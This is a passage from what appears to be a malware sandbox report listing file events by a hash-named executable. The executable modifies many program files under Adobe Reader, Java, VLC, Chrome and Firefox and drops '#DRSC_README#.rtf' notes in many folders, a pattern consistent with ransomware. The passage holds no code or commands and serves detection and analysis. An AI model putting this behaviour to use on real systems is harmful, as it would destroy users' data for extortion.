modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\multi-tab-file-view-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner_mini.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\editpdf-tool-view.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\UnblockWait.jfif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\close.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jsadebugd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\edit-pdf-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\flags.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fr_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\files_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\orbd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoCanary.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\media_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\javacpl.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jvisualvm.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lv.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_initiator.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses_selected.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ru_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\new_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\ResetInvoke.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-BoldIt.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\export.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\close.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\cs_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\remove.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-disabled_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hr.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\tnameserv.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_audit_report_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\kinit.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\servertool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\docs.crx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\sendforsignature.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200722124008.pma 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\PopImport.vstm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\bun.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\blacklist 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_highcontrast.png 